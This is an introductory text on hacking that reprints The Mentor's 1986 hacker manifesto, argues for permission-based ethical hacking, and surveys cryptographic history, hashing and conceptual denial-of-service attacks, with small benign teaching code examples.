LEGIONS UNLEASHED: THE TESTAMENT OF ANARCHISTS




INTRODUCTION
The vast majority of systems around today are internet-based. Over the years, following the improvements predicted by Moore's Law, computer hardware has continued to become both cheaper and faster, and software has become ever more capable and affordable too. However, this capability has brought with it ever more complexity. Complexity can result in more unintended weaknesses being created, often due to a lack of understanding of how to configure systems properly.
 
Many of these weaknesses and vulnerabilities are well known - witness the work of the OWASP Foundation on identifying and mitigating sometimes simple, yet effective, attacks. Witness too, on reading the security breach reports produced annually by many companies, how these same attacks continue to succeed, year on year. Rather worryingly, the average time between breach and discovery remains unacceptably long. In 2012 it averaged around six months; it dropped in the following years, but by 2016 it had risen again to an average of 200 days. Not very comforting.
This suggests a considerable lack of attention on the part of many companies. Many of these breaches are well understood, yet often neglected, meaning many companies are not helping themselves here.

Ethical hacking, which goes hand in hand with penetration testing, is an essential step that companies should take to find out how resilient their systems are to attack. It is not enough to set up a web-based system and expect everything to run perfectly and securely. That is just not going to happen. The first requirement is to test your own systems, as any competent hacker would. Start by using all the known vulnerabilities to see how far the ethical hacker can get towards compromising the system. If the system is resilient to such attacks, that is a great start, but a great many companies fail at this first hurdle, as the security breach reports continue to bear out.
The next stage is more difficult to carry out, and involves trying other means to compromise the system. This is where bad actors have an edge: there are a great many of them who simply try a huge range of activities to see what will break, and once they discover a new vulnerability, they share the details with many others.

At the very least, a company should use ethical hacking and penetration testing to ensure all the known vulnerabilities are properly secured. If it does not have the skills or expertise to carry out ongoing ethical hacking and penetration testing in-house, it should contract the work out to competent outside agencies. It should also implement an effective monitoring system so that security breaches can be detected as they happen, together with a means of retaining the full forensic trail - usually one of the primary targets of a bad actor who compromises a system, in order to cover their tracks.
 
Source code is the framework and skeleton of all software. It is the atomic matter of every piece of firmware and software, and it forms the foundation of a computer system's security defences, graphics capabilities and functionality.
The word hacking is synonymous with breaches, unauthorized entry or access, computer intrusion, or even the unauthorized exploration of roof and utility tunnel spaces.

A hacker is a computer expert with advanced technical knowledge, and activity within the computer programmer subculture is referred to as hacker culture. A security hacker breaches defenses in a computer system.

A computer hacker is any skilled computer expert who uses their technical knowledge to overcome a problem. The term may also refer to a security hacker, who uses bugs or exploits to break into computer systems, while script kiddies are people who break into computers using programs written by others, with very little knowledge of how those programs work.

An adherent of the technology and programming subculture is a hacker, and such a person will always uphold the tenets of ethics and principle, while a cracker is someone who is able to subvert computer security for malicious or non-malicious purposes.
However, the general or mainstream usage of the term hacker in today's media mostly refers to computer criminals, a misuse that dates from the 1980s. Terms such as "black hat", "white hat" and "grey hat" developed when laws against breaking into computers came into effect, to distinguish criminal activities from those which were legal. Sometimes, "hacker" is simply synonymous with "geek": "A true hacker is not a group person. He's a person who loves to stay up all night, he and the machine in a love-hate relationship."
SECURITY HACKING
Security hackers are people involved with circumvention of computer security. Among security hackers, there are several types, including:
- White hat hackers work to keep data safe from other hackers by finding system vulnerabilities that can be mitigated. White hats are usually employed by the target system's owner and are typically paid for their work. Their work is not illegal because it is done with the system owner's consent.
- Black hats, or crackers, are hackers with malicious intentions. They often steal, exploit, and sell data, and are usually motivated by personal gain. Their work is usually illegal; they aim to make a profit rather than simply to vandalize. They may also find exploits for system vulnerabilities and sell the fix to the system owner, or sell the exploit to other black hat hackers, who in turn use it to steal information or extract payment.
- Grey hats are those who hack for fun or to troll. They may both fix and exploit vulnerabilities, but usually not for financial gain. Their work can still be malicious if done without the target system owner's consent, and grey hats are sometimes associated with black hat hackers.

The hacker subculture may focus on creating new infrastructure and improving what already exists, especially the software environment its members work in, or on the general act of circumventing security measures, with the effective use of that knowledge (whether to report and help fix security bugs, or to exploit them) being only secondary.
Security hacking began as early as 1903, when the magician and inventor Nevil Maskelyne disrupted a public demonstration of wireless telegraphy technology by sending insulting Morse code messages through the presenter's projector. Men like Marian Rejewski, Alan Turing, Joe Engressia (a blind boy who discovered the gateway to phone phreaking), Ian Murphy (Captain Zap), Robert T. Morris, Jr. (who created the Morris Worm in 1988), Kevin Mitnick, Onel de Guzman (a Filipino who scripted the "ILOVEYOU" worm, also known as VBS/LoveLetter and the Love Bug worm, in 2000), Jonathan James and Dmitry Sklyarov followed - the list is endless.

THE CONSCIENCE OF A HACKER (HACKER'S MANIFESTO)
The Conscience of a Hacker is a short essay written on January 8, 1986 by a computer security hacker who went by the handle/pseudonym of The Mentor (Loyd Blankenship), a member of the second generation of the hacker group Legion of Doom.
It was written after the author's arrest and first published in the underground hacker ezine Phrack. Considered a cornerstone of hacker culture, the Manifesto acts as a guideline to hackers across the globe, especially those new to the field. It serves as an ethical foundation for hacking, asserting that there is a point to hacking that supersedes selfish desires to exploit or harm other people, and that technology should be used to expand our horizons and try to keep the world free.
 
=-=The following was written shortly after my arrest... \/\The Conscience of a Hacker/\ by +++The Mentor+++ Written on January 8, 1986=-=
        Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"…Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world...Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me...Or feels threatened by me...Or thinks I'm a smart ass...Or doesn't like teaching and shouldn't be here...Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found.  "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...Damn kid. Tying up the phone line again. They're all alike...You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
 +++The Mentor+++
Hacking is not simply the ability to locate bugs, nor the ability to write shell scripts and execute shellcode. It is more than being a competent programmer or skilled software engineer; it is a matter of both skill and mindset. It is not a fixed pattern or system, but a framework for adapting and thinking outside the box: coming up with new tricks and knowledge, being precise, reacting quickly, and creating and executing plans well. The cycle follows this pattern: from the mentality to the programming, and from the usage to the creation of tools and scripts and their execution.
However, it is important that hackers maintain ethics, because the abuse of skill in the hacking world can cause harm to others. Remember: it is almost impossible to gain respect at the expense of others.

The Initial or Pre-existing Ethic
Back when computers just started to reach universities and colleges and students had access to use computer systems, curious users began to show a certain disregard for the pre-existing rules. These users would enter sections of the system without authorization, gaining access to privileged or elevated resources. With no Internet and no copies of Hacking Exposed or Security Warrior to assist them, they had to figure out how to enter the systems on their own.
Although these young students represented the first hackers, they had no malicious intent; they simply wanted knowledge, information, a deeper understanding of the systems which they had access to. To justify and eventually distinguish their efforts, the hacking community developed The Hacker Ethic as a core part of their subculture. The Hacker Ethic states two basic principles:
 
-Do no damage.
-Make no one pay for your actions.
 
These two principles go hand in hand. The original hackers intended to learn about the systems they invaded, not to destroy them or steal valuable confidential information. They wanted to know how they worked: their flaws, their strengths, interesting aspects of their design. They had no authorization; at the time, they made up for this by making a point of neither interfering with anyone's work nor costing anyone any money in the process of exploring the system. Unfortunately, this mantra does not provide fully effective cover for your actions. Even disregarding the legal ramifications, such as the Computer Fraud and Abuse Act of 1986, your actions can have devastating unintended consequences if not carefully controlled. Robert Morris created the Morris Worm to gauge the size of the Internet harmlessly; unfortunately, it loaded down the systems it infected through exponential re-infection, causing substantial financial damage.
You must always remember to carefully consider the short and long term impact of your actions on any system.
 
Modern or Today’s Ethic…
Today we need to add one more rule to The Hacker Ethic, a rule that we should have added long ago. The Morris Worm illustrates why this rule exists, even beyond legality.
-Always get permission ahead of time.
Your actions can cause major disruption to the targets you attack. Networks become slow, servers crash or hang, and you create spurious log entries. Any institution with a capable information assurance (IA) sector will notice your attack and panic, believing you to have malicious intent; it will invariably expend resources searching for back doors and trying to determine what confidential information you stole. All of this, even if you don't get caught, demands that you acquire permission ahead of time. You always have authorization to hack into servers you own. In all other cases, you need to ask the owners of the machines for authorization; you can even ask them to pay for it, selling your services as penetration testing and giving them a comprehensive outline of their network's vulnerabilities and the proper mitigation steps to improve their security. As long as you have permission ahead of time, and you remember the first two rules of The Hacker Ethic, you can do as you please with the network and the affected machines.

The Prerequisite Knowledge
Some background knowledge required to begin learning is as follows:
1. Knowledge of a computer's internal hardware and what it does, such as the CPU and RAM.
2. Programming experience: a good knowledge of C, C++, Python, Java, etc.
3. A desire to learn new things, and plenty of motivation and resilience to keep going.

HASHING: THE CONCEPT OF DIGITAL GIBBERISH
Encryption in modern times is achieved by using algorithms that have a key to encrypt and decrypt information. These keys convert the messages and data into "digital gibberish" through encryption and then return them to the original form through decryption. In general, the longer the key is, the more difficult it is to crack the encrypted code. This holds true because deciphering an encrypted message by brute force would require the attacker to try every possible key. To put this in context, each binary unit of information, or bit, has a value of 0 or 1. An 8-bit key would then have 2^8, or 256, possible keys.
A 56-bit key would have 2^56, or about 72 quadrillion, possible keys to try to decipher the message. With modern technology, cyphers using keys of these lengths are becoming easier to break. DES, an early US Government approved cypher, has an effective key length of 56 bits, and test messages using that cypher have been broken by brute force key search.
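The key-space arithmetic above is easy to check directly. A minimal sketch; the one-billion-trials-per-second rate is an illustrative assumption, not a measurement of any real cracking hardware:

```python
# Number of possible keys for a k-bit key is 2 ** k.
keys_8_bit = 2 ** 8     # 256
keys_56_bit = 2 ** 56   # 72,057,594,037,927,936 -- roughly 72 quadrillion

# Assumed rate: one billion key trials per second (purely illustrative).
trials_per_second = 1_000_000_000
worst_case_seconds = keys_56_bit / trials_per_second
worst_case_years = worst_case_seconds / (60 * 60 * 24 * 365)

print(keys_8_bit)
print(keys_56_bit)
print(round(worst_case_years, 2))  # a little over two years at this rate
```

Doubling the key length squares the key space, which is why each extra bit matters so much against brute force.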
However, as technology advances, so does the quality of encryption. Since World War II, one of the most notable advances in the study of cryptography is the introduction of the asymmetric key cyphers (sometimes termed public-key cyphers). These are algorithms which use two mathematically related keys for encryption of the same message. Some of these algorithms permit publication of one of the keys, due to it being extremely difficult to determine one key simply from knowledge of the other.
 
Beginning around 1990, the use of the Internet for commercial purposes and the introduction of commercial transactions over the Internet called for a widespread standard for encryption. Before the introduction of the Advanced Encryption Standard (AES), information sent over the Internet, such as financial data, was encrypted if at all, most commonly using the Data Encryption Standard (DES). This had been approved by NBS (a US Government agency) for its security, after public call for, and a competition among, candidates for such a cypher algorithm. DES was approved for a short period, but saw extended use due to complex wrangles over the use by the public of high quality encryption.
DES was finally replaced by the AES after another public competition organized by the NBS successor agency, NIST. Around the late 1990s to early 2000s, the use of public-key algorithms became a more common approach for encryption, and soon a hybrid of the two schemes became the most accepted way for e-commerce operations to proceed. Additionally, the creation of a new protocol known as the Secure Socket Layer, or SSL, led the way for online transactions to take place.

Transactions ranging from purchasing goods to online bill pay and banking used SSL. Furthermore, as wireless Internet connections became more common among households, the need for encryption grew, as a level of security was needed in these everyday situations.
 

HISTORY OF CRYPTOGRAPHIC HASHING
Claude Shannon
Claude E. Shannon is considered by many to be the father of mathematical cryptography. Shannon worked for several years at Bell Labs, and during his time there, he produced a classified memorandum entitled "A Mathematical Theory of Cryptography". It was written in 1945 and eventually published, as "Communication Theory of Secrecy Systems", in the Bell System Technical Journal in 1949.
It is commonly accepted that this paper was the starting point for development of modern cryptography. Shannon was inspired during the war to address "the problems of cryptography because secrecy systems furnish an interesting application of communication theory". Shannon identified the two main goals of cryptography: secrecy and authenticity. His focus was on exploring secrecy and thirty-five years later, G.J. Simmons would address the issue of authenticity.
Shannon wrote a further article entitled "A mathematical theory of communication" which highlights one of the most significant aspects of his work: cryptography's transition from art to science. In his works, Shannon described the two basic types of systems for secrecy. The first are those designed with the intent to protect against hackers and attackers who have infinite resources with which to decode a message (theoretical secrecy, now unconditional security), and the second are those designed to protect against hackers and attacks with finite resources with which to decode a message (practical secrecy, now computational security). Most of Shannon's work focused around theoretical secrecy; here, Shannon introduced a definition for the "unbreakability" of a cipher.
If a cipher was determined "unbreakable", it was considered to have "perfect secrecy". In proving "perfect secrecy", Shannon determined that this could only be obtained with a secret key whose length given in binary digits was greater than or equal to the number of bits contained in the information being encrypted. Furthermore, Shannon developed the "unicity distance", defined as the "amount of plaintext that… determines the secret key.”
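Shannon's condition for perfect secrecy - a truly random key at least as long as the message, used only once - is exactly what the one-time pad satisfies. A minimal sketch in Python, assuming the key is never reused:

```python
import secrets

def one_time_pad(data: bytes, key: bytes) -> bytes:
    # Perfect secrecy requires the key to be at least as long as the message.
    assert len(key) >= len(data)
    # XOR each message byte with the corresponding key byte.
    return bytes(d ^ k for d, k in zip(data, key))

message = b"ATTACK AT DAWN"
key = secrets.token_bytes(len(message))  # truly random, same length, used once

ciphertext = one_time_pad(message, key)
# XOR is its own inverse, so the same function decrypts.
assert one_time_pad(ciphertext, key) == message
```

The scheme is unconditionally secure but impractical at scale, precisely because distributing key material as long as all future traffic is so hard - the key-distribution problem the later sections return to.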
Shannon's work influenced further cryptography research in the 1970s, as the public-key cryptography developers, M. E. Hellman and W. Diffie cited Shannon's research as a major influence. His work also impacted modern designs of secret-key ciphers. At the end of Shannon's work with cryptography, progress slowed until Hellman and Diffie introduced their paper involving "public-key cryptography".

An encryption standard
The mid-1970s saw two major public (i.e., non-secret) advances. First was the publication of the draft Data Encryption Standard in the U.S. Federal Register on 17 March 1975. The proposed DES cipher was submitted by a research group at IBM, at the invitation of the National Bureau of Standards (now NIST), in an effort to develop secure electronic communication facilities for businesses such as banks and other large financial organizations. After advice and modification by the NSA, acting behind the scenes, it was adopted and published as a Federal Information Processing Standard Publication in 1977 (currently at FIPS 46-3). DES was the first publicly accessible cipher to be 'blessed' by a national agency such as the NSA. The release of its specification by NBS stimulated an explosion of public and academic interest in cryptography.
The aging DES was officially replaced by the Advanced Encryption Standard (AES) in 2001 when NIST announced FIPS 197. After an open competition, NIST selected Rijndael, submitted by two Belgian cryptographers, to be the AES. DES, and more secure variants of it (such as Triple DES), are still used today, having been incorporated into many national and organizational standards. However, its 56-bit key-size has been shown to be insufficient to guard against brute force attacks (one such attack, undertaken by the cyber civil-rights group Electronic Frontier Foundation in 1998, succeeded in 56 hours.)
As a result, use of straight DES encryption is now without doubt insecure for use in new cryptosystem designs, and messages protected by older cryptosystems using DES, and indeed all messages sent since 1976 using DES, are also at risk. Regardless of DES' inherent quality, the DES key size (56-bits) was thought to be too small by some even in 1976, perhaps most publicly by Whitfield Diffie. There was suspicion that government organizations even then had sufficient computing power to break DES messages; clearly others have achieved this capability.

Public key
The second development, in 1976, was perhaps even more important, for it fundamentally changed the way cryptosystems might work. This was the publication of the paper New Directions in Cryptography by Whitfield Diffie and Martin Hellman. It introduced a radically new method of distributing cryptographic keys, which went far toward solving one of the fundamental problems of cryptography, key distribution, and has become known as Diffie–Hellman key exchange. The article also stimulated the almost immediate public development of a new class of enciphering algorithms, the asymmetric key algorithms.
Prior to that time, all useful modern encryption algorithms had been symmetric key algorithms, in which the same cryptographic key is used with the underlying algorithm by both the sender and the recipient, who must both keep it secret. All of the electromechanical machines used in World War II were of this logical class, as were the Caesar and Atbash ciphers and essentially all cipher systems throughout history. The 'key' for a code is, of course, the codebook, which must likewise be distributed and kept secret, and so shares most of the same problems in practice.
Of necessity, the key in every such system had to be exchanged between the communicating parties in some secure way prior to any use of the system (the term usually used is 'via a secure channel') such as a trustworthy courier with a briefcase handcuffed to a wrist, or face-to-face contact, or a loyal carrier pigeon. This requirement is never trivial and very rapidly becomes unmanageable as the number of participants increases, or when secure channels aren't available for key exchange, or when, as is sensible cryptographic practice, keys are frequently changed. In particular, if messages are meant to be secure from other users, a separate key is required for each possible pair of users. A system of this kind is known as a secret key, or symmetric key cryptosystem. D-H key exchange (and succeeding improvements and variants) made operation of these systems much easier, and more secure, than had ever been possible before in all of history.
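The pairwise-key explosion described above is easy to quantify: with n users, every distinct pair needs its own shared secret, giving n(n-1)/2 keys. A quick illustration:

```python
def pairwise_keys(n_users: int) -> int:
    # Each distinct pair of users needs its own shared secret key:
    # n choose 2 = n * (n - 1) / 2.
    return n_users * (n_users - 1) // 2

print(pairwise_keys(10))     # 45 keys for 10 users
print(pairwise_keys(1000))   # 499,500 keys for 1,000 users
```

The quadratic growth is why pre-shared symmetric keys alone cannot scale to an open network, and why Diffie-Hellman key exchange was such a breakthrough.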
In contrast, asymmetric key encryption uses a pair of mathematically related keys, each of which decrypts the encryption performed using the other. Some, but not all, of these algorithms have the additional property that one of the paired keys cannot be deduced from the other by any known method other than trial and error. An algorithm of this kind is known as a public key or asymmetric key system. Using such an algorithm, only one key pair is needed per user. By designating one key of the pair as private (always secret), and the other as public (often widely available), no secure channel is needed for key exchange. So long as the private key stays secret, the public key can be widely known for a very long time without compromising security, making it safe to reuse the same key pair indefinitely.
For two users of an asymmetric key algorithm to communicate securely over an insecure channel, each user will need to know their own public and private keys as well as the other user's public key. Take this basic scenario: Alice and Bob each have a pair of keys they've been using for years with many other users. At the start of their message, they exchange public keys, unencrypted over an insecure line. Alice then encrypts a message using her private key, and then re-encrypts that result using Bob's public key. The double-encrypted message is then sent as digital data over a wire from Alice to Bob. Bob receives the bit stream and decrypts it using his own private key, and then decrypts that bit stream using Alice's public key. If the final result is recognizable as a message, Bob can be confident that the message actually came from someone who knows Alice's private key (presumably actually her if she's been careful with her private key), and that anyone eavesdropping on the channel will need Bob's private key in order to understand the message.
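The public/private-key operations underlying the Alice-and-Bob exchange can be sketched with a toy RSA-style key pair. The primes here are deliberately tiny, textbook values for illustration only; real deployments use primes hundreds of digits long and padded messages:

```python
# Toy RSA key generation with tiny, illustrative primes.
p, q = 61, 53
n = p * q                 # 3233: the public modulus
phi = (p - 1) * (q - 1)   # 3120
e = 17                    # public exponent, coprime with phi
d = pow(e, -1, phi)       # private exponent: modular inverse (Python 3.8+)

message = 65                        # a message encoded as a number < n
ciphertext = pow(message, e, n)     # encrypt with the public key (e, n)
recovered = pow(ciphertext, d, n)   # decrypt with the private key (d, n)
assert recovered == message
```

Encrypting with d instead of e gives the signing direction Alice uses in the scenario above: anyone holding her public key can verify the result, but only she could have produced it.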

Asymmetric algorithms rely for their effectiveness on a class of problems in mathematics called one-way functions, which require relatively little computational power to execute, but vast amounts of power to reverse, if reversal is possible at all. A classic example of a one-way function is multiplication of very large prime numbers. It's fairly quick to multiply two large primes, but very difficult to find the factors of the product of two large primes. Because of the mathematics of one-way functions, most possible keys are bad choices as cryptographic keys; only a small fraction of the possible keys of a given length are suitable, and so asymmetric algorithms require very long keys to reach the same level of security provided by relatively shorter symmetric keys. The need to both generate the key pairs, and perform the encryption/decryption operations make asymmetric algorithms computationally expensive, compared to most symmetric algorithms. Since symmetric algorithms can often use any sequence of (random, or at least unpredictable) bits as a key, a disposable session key can be quickly generated for short-term use.
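The multiply-fast, factor-slow asymmetry can be felt even at toy scale. A sketch using two small primes (chosen arbitrarily here); naive trial division already has to do tens of thousands of steps to undo one instant multiplication:

```python
p, q = 104_723, 104_729   # two small primes, for illustration only
n = p * q                 # multiplication is effectively instant

def trial_factor(n: int):
    # Naive factoring: cost grows with the smaller prime factor,
    # which is why real keys use primes hundreds of digits long.
    f = 3
    while f * f <= n:
        if n % f == 0:
            return f, n // f
        f += 2
    return 1, n  # n is prime (or even, which we ignore in this sketch)

assert trial_factor(n) == (p, q)
```

Scaling the primes from six digits to several hundred digits leaves the multiplication cheap while pushing every known factoring method beyond reach, which is the entire basis of RSA-style security.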

Consequently, it is common practice to use a long asymmetric key to exchange a disposable, much shorter (but just as strong) symmetric key. The slower asymmetric algorithm securely sends a symmetric session key, and the faster symmetric algorithm takes over for the remainder of the message.
Asymmetric key cryptography, Diffie–Hellman key exchange, and the best known of the public key / private key algorithms (i.e., what is usually called the RSA algorithm), all seem to have been independently developed at a UK intelligence agency before the public announcement by Diffie and Hellman in 1976. GCHQ has released documents claiming they had developed public key cryptography before the publication of Diffie and Hellman's paper. Various classified papers were written at GCHQ during the 1960s and 1970s which eventually led to schemes essentially identical to RSA encryption and to Diffie–Hellman key exchange in 1973 and 1974. Some of these have now been published, and the inventors (James H. Ellis, Clifford Cocks, and Malcolm Williamson) have made public (some of) their work.

Hashing
Hashing is a common technique used in cryptography to encode information quickly using typical algorithms. Generally, an algorithm is applied to a string of text, and the resulting string becomes the "hash value". This creates a "digital fingerprint" of the message, as the specific hash value is used to identify a specific message. The output from the algorithm is also referred to as a "message digest" or a "check sum". Hashing is good for determining if information has been changed in transmission. If the hash value is different upon reception than upon sending, there is evidence the message has been altered. Once the algorithm has been applied to the data to be hashed, the hash function produces a fixed-length output. Essentially, anything passed through the hash function should resolve to the same length output as anything else passed through the same hash function.
It is important to note that hashing is not the same as encrypting. Hashing is a one-way operation that is used to transform data into the compressed message digest. Additionally, the integrity of the message can be measured with hashing. Conversely, encryption is a two-way operation that is used to transform plaintext into cipher-text and then vice versa. In encryption, the confidentiality of a message is guaranteed.
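Both properties described above - the fixed-length output and the tamper-evident "fingerprint" - are easy to see with a standard library hash. A small sketch using Python's hashlib; SHA-256 is chosen here purely for illustration:

```python
import hashlib

message = b"Transfer $100 to Alice"
digest = hashlib.sha256(message).hexdigest()

# SHA-256 always produces 256 bits (64 hex characters),
# regardless of the input length.
assert len(digest) == 64
assert len(hashlib.sha256(b"x" * 10_000).hexdigest()) == 64

# Any change to the message yields a completely different digest,
# which is how hashing reveals alteration in transit.
tampered = hashlib.sha256(b"Transfer $900 to Alice").hexdigest()
assert digest != tampered
```

Note that the digest alone cannot be "decrypted" back into the message; verification works by re-hashing the received data and comparing digests.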
 
Hash functions can be used to verify digital signatures, so that when signing documents via the Internet, the signature is applied to one particular individual. Much like a hand-written signature, these signatures are verified by assigning their exact hash code to a person. Furthermore, hashing is applied to passwords for computer systems. Hashing for passwords began with the UNIX operating system. A user on the system would first create a password. That password would be hashed, using an algorithm or key, and then stored in a password file. This is still prominent today, as web applications that require passwords will often hash user's passwords and store them in a database.
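Password storage along these lines can be sketched with a salted, iterated hash. PBKDF2 with SHA-256 is used here as one common stdlib choice; the 100,000-iteration count is an illustrative assumption, not a tuned recommendation:

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # illustrative work factor; tune for real systems

def hash_password(password: str, salt: bytes = None):
    # A random salt ensures identical passwords produce different records.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    # Re-derive the hash and compare in constant time.
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored)

salt, stored = hash_password("correct horse battery staple")
assert verify_password("correct horse battery staple", salt, stored)
assert not verify_password("wrong password", salt, stored)
```

Because hashing is one-way, the server never needs to store the password itself - only the salt and digest - which is exactly why the UNIX approach described above became universal.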

Cryptography Politics
The public developments of the 1970s broke the near monopoly on high quality cryptography held by government organizations (see S Levy's Crypto for a journalistic account of some of the policy controversy of the time in the US). For the first time ever, those outside government organizations had access to cryptography not readily breakable by anyone (including governments). Considerable controversy, and conflict, both public and private, began more or less immediately, sometimes called the crypto wars. They have not yet subsided. In many countries, for example, export of cryptography is subject to restrictions. Until 1996 export from the U.S. of cryptography using keys longer than 40 bits (too small to be very secure against a knowledgeable attacker) was sharply limited.
As recently as 2004, former FBI Director Louis Freeh, testifying before the 9/11 Commission, called for new laws against public use of encryption.
One of the most significant people favoring strong encryption for public use was Phil Zimmermann. He wrote and then in 1991 released PGP (Pretty Good Privacy), a very high quality crypto system. He distributed a freeware version of PGP when he felt threatened by legislation then under consideration by the US Government that would require backdoors to be included in all cryptographic products developed within the US. The system spread worldwide shortly after its US release, which began a long criminal investigation of Zimmermann by the US Justice Department for alleged violation of export restrictions. The Justice Department eventually dropped its case, and the freeware distribution of PGP has continued around the world. PGP eventually became an open Internet standard (RFC 2440, or OpenPGP).

Modern cryptanalysis
While modern ciphers like AES and the higher quality asymmetric ciphers are widely considered unbreakable, poor designs and implementations are still sometimes adopted and there have been important cryptanalytic breaks of deployed crypto systems in recent years. Notable examples of broken crypto designs include the first Wi-Fi encryption scheme WEP, the Content Scrambling System used for encrypting and controlling DVD use, the A5/1 and A5/2 ciphers used in GSM cell phones, and the CRYPTO1 cipher used in the widely deployed MIFARE Classic smart cards from NXP Semiconductors, a spun off division of Philips Electronics. All of these are symmetric ciphers. Thus far, not one of the mathematical ideas underlying public key cryptography has been proven to be 'unbreakable', and so some future mathematical analysis advance might render systems relying on them insecure. While few informed observers foresee such a breakthrough, the key size recommended for security as best practice keeps increasing as increased computing power required for breaking codes becomes cheaper and more available. Quantum computers, if ever constructed with enough capacity, could break existing public key algorithms and efforts are underway to develop and standardize post-quantum cryptography.

Even without breaking encryption in the traditional sense, side-channel attacks can be mounted that exploit information gained from the way a computer system is implemented, such as cache memory usage, timing information, power consumption, electromagnetic leaks or even sounds emitted. Newer cryptographic algorithms are being developed that make such attacks more difficult.
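The timing variant of such side channels can be sketched in a few lines of Python: a naive byte-by-byte comparison returns as soon as bytes differ, so its running time leaks how much of a secret value a guess got right, while the standard library's hmac.compare_digest compares in constant time. The function name naive_equal is ours, for illustration:

```python
import hmac

# Naive equality check: exits at the first mismatching byte, so the time
# it takes depends on how long the matching prefix is -- a timing channel.
def naive_equal(a: bytes, b: bytes) -> bool:
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:          # early exit leaks position of first mismatch
            return False
    return True

secret = b"correct-mac-value"

# hmac.compare_digest takes the same time regardless of where the first
# mismatch occurs, closing the timing channel.
assert hmac.compare_digest(secret, b"correct-mac-value")
assert not hmac.compare_digest(secret, b"guessed-mac-value")
```

This is why MAC and token comparisons in real systems should use a constant-time primitive rather than ordinary equality.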

DENIAL OF SERVICE ATTACK
What is a denial-of-service attack?
A denial-of-service (DoS) attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. Services affected may include email, websites, online accounts (e.g., banking), or other services that rely on the affected computer or network. A denial-of-service condition is accomplished by flooding the targeted host or network with traffic until the target cannot respond or simply crashes, preventing access for legitimate users. DoS attacks can cost an organization both time and money while their resources and services are inaccessible.

What are common denial-of-service attacks?
There are many different methods for carrying out a DoS attack. The most common method of attack occurs when an attacker floods a network server with traffic. In this type of DoS attack, the attacker sends several requests to the target server, overloading it with traffic. These service requests are illegitimate and have fabricated return addresses, which mislead the server when it tries to authenticate the requestor. As the junk requests are processed constantly, the server is overwhelmed, which causes a DoS condition to legitimate requestors.
In a Smurf Attack, the attacker sends Internet Control Message Protocol broadcast packets to a number of hosts with a spoofed source Internet Protocol (IP) address that belongs to the target machine. The recipients of these spoofed packets will then respond, and the targeted host will be flooded with those responses.
A SYN flood occurs when an attacker sends a request to connect to the target server but does not complete the connection through what is known as a three-way handshake—a method used in a Transmission Control Protocol (TCP)/IP network to create a connection between a local host/client and server. The incomplete handshake leaves the connected port in an occupied status and unavailable for further requests. An attacker will continue to send requests, saturating all open ports, so that legitimate users cannot connect.
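The mechanics of backlog exhaustion can be sketched with a toy model. This is an illustrative simulation of the half-open connection queue, not real TCP:

```python
# Toy model of a server's SYN backlog: each incoming SYN consumes a
# half-open slot until the final ACK of the three-way handshake
# completes the connection (or a timeout/reset frees the slot).
class SynQueue:
    def __init__(self, backlog: int):
        self.backlog = backlog
        self.half_open = set()

    def syn(self, src: str) -> bool:
        """Handle an incoming SYN; return False when the backlog is full."""
        if len(self.half_open) >= self.backlog:
            return False
        self.half_open.add(src)
        return True

    def ack(self, src: str) -> None:
        """Final ACK (or timeout/reset) frees the half-open slot."""
        self.half_open.discard(src)

q = SynQueue(backlog=128)

# The attacker sends SYNs from spoofed sources and never completes
# the handshake, saturating every slot.
for i in range(128):
    q.syn(f"spoofed-{i}")

assert q.syn("legitimate-client") is False   # service denied

# Once half-open entries expire, legitimate clients can connect again.
q.ack("spoofed-0")
assert q.syn("legitimate-client") is True
```

Real mitigations such as SYN cookies avoid reserving state per half-open connection at all, which is why they defeat this exhaustion pattern.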
Individual networks may be affected by DoS attacks without being directly targeted. If the network’s internet service provider (ISP) or cloud service provider has been targeted and attacked, the network will also experience a loss of service.

What is a distributed denial-of-service attack?
A distributed denial-of-service (DDoS) attack occurs when multiple machines are operating together to attack one target. DDoS attackers often leverage the use of a botnet—a group of hijacked internet-connected devices to carry out large scale attacks. Attackers take advantage of security vulnerabilities or device weaknesses to control numerous devices using command and control software. Once in control, an attacker can command their botnet to conduct DDoS on a target. In this case, the infected devices are also victims of the attack.
Botnets—made up of compromised devices—may also be rented out to other potential attackers. Often the botnet is made available to “attack-for-hire” services, which allow unskilled users to launch DDoS attacks.
DDoS allows for exponentially more requests to be sent to the target, therefore increasing the attack power. It also increases the difficulty of attribution, as the true source of the attack is harder to identify.
